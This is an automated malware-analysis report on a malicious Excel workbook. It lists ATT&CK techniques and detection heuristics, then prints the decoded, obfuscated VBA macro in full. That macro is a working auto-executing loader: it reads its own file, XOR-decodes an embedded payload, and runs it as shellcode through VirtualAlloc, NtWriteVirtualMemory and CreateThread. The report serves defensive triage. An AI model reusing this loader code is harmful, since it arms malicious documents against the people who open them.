Verdict: MALICIOUS
Risk Score: 78
Malware Insights
MITRE ATT&CK:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File (malicious macro)
The file contains both VBA and Excel 4.0 (XLM) macros, and the Workbook_Open and Document_Open auto-execution heuristics fire. The VBA macro declares VirtualAlloc, NtWriteVirtualMemory and CreateThread, indicating that it likely allocates memory, writes a decoded payload into it and executes it as shellcode. The obfuscated identifier names together with these Windows API calls suggest downloader or dropper functionality.
Heuristics: 6
- Reference to VirtualAlloc API (medium, SC_STR_VIRTUALALLOC): Reference to VirtualAlloc API.
- Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN): Workbook contains an Excel 4.0 macro sheet sub-stream. XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code.
- Document_Open macro (low, OLE_VBA_DOCOPEN): Document_Open macro. Matched lines in script: "Public Sub Document_Open()" and "raHdABOeZHybFUqnxMvUML".
- Workbook_Open macro (low, OLE_VBA_WBOPEN): Workbook_Open macro. Matched lines in script: "Sub Workbook_Open()" and "Document_Open".
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts: 2
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 172 bytes |
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4702 bytes |

xlm_macros.txt
SHA-256: 63d3437f0ef9d6e6f7cafadd6a5473d8826a0decff0e7e519719b73893f4ae2d
Preview script (first 1,000 lines of the extracted script):
' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - Makro
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value

macros.bas
SHA-256: dade35c58122e76a9a8383fdb73fd13a8d23a273f6b5a2268ffacbb32f2b52f7
Detection
ClamAV: No threats found
Obfuscation or payload: likely
39 of 71 identifiers look randomly generated (e.g. 'haJVowPdLioiEJsWdFBQHWTYsmvjmYTVPqgpmXJX'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "BuÇalışmaKitabı"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
#If VBA7 Then
Private Declare PtrSafe Function bqEDQaVZHp Lib "kernel32" Alias "CreateThread" (ByVal GnoZFFcUTHyivIoyiT As Long, ByVal DsFGfvuEzTNzktrXHao As Long, ByVal NgqSJbdGhvTcOAXkbHiElaDafinOe As LongPtr, GyTUQxcMWerNxeZLKKvhVaR As Long, ByVal OMDpNBNpCvOviUJAhoKenx As Long, yauyDsWPGGjgeUMZvqb As Long) As LongPtr
Private Declare PtrSafe Function wqieosdkWGFhPYNFGvppOln Lib "kernel32" Alias "VirtualAlloc" (ByVal vHDVbI As Long, ByVal OvgKRRHcSOTphyBmnvEDF As LongPtr, ByVal dtuUzBNLSZlpBLPjcZ As Long, ByVal pucRoLDTvpz As Long) As LongPtr
Private Declare PtrSafe Function NtWriteVirtualMemory Lib "NTDLL" (ByVal fclrNqWsgohWUdS As LongPtr, ByVal QwdsFppibBfiVHsvsCgmptcTgHha As LongPtr, ByVal gXkTGcZmhRP As String, ByVal dqmkNwyWMDrXFHxujmXhoVU As LongPtr, ByRef VooEsilLrzmcPJskIeB As LongPtr) As LongPtr
#Else
Private Declare Function bqEDQaVZHp Lib "kernel32" Alias "CreateThread" (ByVal GnoZFFcUTHyivIoyiT As Long, ByVal DsFGfvuEzTNzktrXHao As Long, ByVal NgqSJbdGhvTcOAXkbHiElaDafinOe As Long, GyTUQxcMWerNxeZLKKvhVaR As Long, ByVal OMDpNBNpCvOviUJAhoKenx As Long, yauyDsWPGGjgeUMZvqb As Long) As Long
Private Declare Function wqieosdkWGFhPYNFGvppOln Lib "kernel32" Alias "VirtualAlloc" (ByVal vHDVbI As Long, ByVal OvgKRRHcSOTphyBmnvEDF As Long, ByVal dtuUzBNLSZlpBLPjcZ As Long, ByVal pucRoLDTvpz As Long) As Long
Private Declare Function NtWriteVirtualMemory Lib "NTDLL" (ByVal fclrNqWsgohWUdS As Long, ByVal QwdsFppibBfiVHsvsCgmptcTgHha As Long, ByVal gXkTGcZmhRP As String, ByVal dqmkNwyWMDrXFHxujmXhoVU As Long, ByRef VooEsilLrzmcPJskIeB As Long) As Long
#End If
Const BQtsEMXQdQ = &H1000
Const kxiEEplHEtFygBTjeOIiho = &H40
Public Sub raHdABOeZHybFUqnxMvUML()
Dim VuQRdWV() As Byte
VuQRdWV = CokBrkmkOTTa(ActiveWorkbook.FullName)
Dim jyjPJ As String
jyjPJ = StrConv(VuQRdWV, 64)
Dim CKEcHyHGwDDAHLySoXFU
CKEcHyHGwDDAHLySoXFU = Split(jyjPJ, "haJVowPdLioiEJsWdFBQHWTYsmvjmYTVPqgpmXJXfIwlwlknBMgwIHAlhLCbaGQMossoDcJfVDKYAIBhbiHASwniQUiBvHWz")
Dim JKKLidHoCwfHIVbRSfnyoYm As String
Dim USPbaXBGT As String
Dim XefQKouerNuRsviD As String
USPbaXBGT = StrConv(StrConv(CKEcHyHGwDDAHLySoXFU(UBound(CKEcHyHGwDDAHLySoXFU)), 64), 128)
XefQKouerNuRsviD = Mid$(USPbaXBGT, 3, Len(USPbaXBGT))
JKKLidHoCwfHIVbRSfnyoYm = iEBUuBXDakOwcUky("JWeSWJycaBeXCLyjuaSYqURekx", XefQKouerNuRsviD)
#If VBA7 Then
Dim zXQUeXNBXvoNaUW As LongPtr
Dim gWUTRWrnQLDT As LongPtr
#Else
Dim zXQUeXNBXvoNaUW As Long
Dim gWUTRWrnQLDT As Long
#End If
zXQUeXNBXvoNaUW = wqieosdkWGFhPYNFGvppOln(0, Len(JKKLidHoCwfHIVbRSfnyoYm), BQtsEMXQdQ, kxiEEplHEtFygBTjeOIiho)
gWUTRWrnQLDT = NtWriteVirtualMemory(-1, zXQUeXNBXvoNaUW, JKKLidHoCwfHIVbRSfnyoYm, Len(JKKLidHoCwfHIVbRSfnyoYm), 0)
gWUTRWrnQLDT = bqEDQaVZHp(0, 0, zXQUeXNBXvoNaUW, 0, 0, 0)
End Sub
Public Function CokBrkmkOTTa(ByVal qyuarThySZQwawRswxLxviUTfWs As String) As Byte()
Dim USPbaXBGT As Long
Dim XefQKouerNuRsviD() As Byte
USPbaXBGT = FreeFile
If LenB(Dir(qyuarThySZQwawRswxLxviUTfWs)) Then
Open qyuarThySZQwawRswxLxviUTfWs For Binary Access Read As USPbaXBGT
ReDim XefQKouerNuRsviD(LOF(USPbaXBGT) - 1&) As Byte
Get USPbaXBGT, , XefQKouerNuRsviD
Close USPbaXBGT
Else
Err.Raise 53
End If
CokBrkmkOTTa = XefQKouerNuRsviD
Erase XefQKouerNuRsviD
End Function
Public Sub Document_Open()
raHdABOeZHybFUqnxMvUML
End Sub
Sub Workbook_Open()
Document_Open
End Sub
Public Function iEBUuBXDakOwcUky(AGrFyFzaFEPdAtSxztcsDCCinJdFI As String, TjsuUBlTJYbT As String) As String
Dim WhAzRWYDAiguXdjrOCUrqLGK As Long
Dim yrlFJeq As String
Dim NGaNjmJKLsbmZXxcBVwhBy As Integer, iwQHCxWirTNQVPyGsf As Integer, a As Long
For WhAzRWYDAiguXdjrOCUrqLGK = 1 To Len(TjsuUBlTJYbT)
a = WhAzRWYDAiguXdjrOCUrqLGK Mod Len(AGrFyFzaFEPdAtSxztcsDCCinJdFI)
If a = 0 Then a = Len(AGrFyFzaFEPdAtSxztcsDCCinJdFI)
NGaNjmJKLsbmZXxcBVwhBy = Asc(Mid$(TjsuUBlTJYbT, WhAzRWYDAiguXdjrOCUrqLGK, 1))
iwQHCxWirTNQVPyGsf = Asc(Mid$(AGrFyFzaFEPdAtSxztcsDCCinJdFI, a, 1))
yrlFJeq = yrlFJeq + Chr(NGaNjmJKLsbmZXxcBVwhBy Xor iwQHCxWirTNQVPyGsf)
Next WhAzRWYDAiguXdjrOCUrqLGK
iEBUuBXDakOwcUky = yrlFJeq
End Function